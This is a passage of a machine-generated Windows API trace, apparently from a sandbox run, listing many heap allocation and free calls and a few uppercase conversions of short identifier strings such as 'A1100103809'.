Flags=0x0, Size=0x20) returned 0x2a780e8 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0200.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0200.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0200.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0200.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0200.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0200.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0200.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0200.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0200.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0200.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0200.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.229] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0200.229] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0200.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0200.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0200.230] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0200.230] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0200.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.232] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab28 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b78 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0200.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0200.232] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0200.234] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0200.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0200.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0200.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0200.235] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) 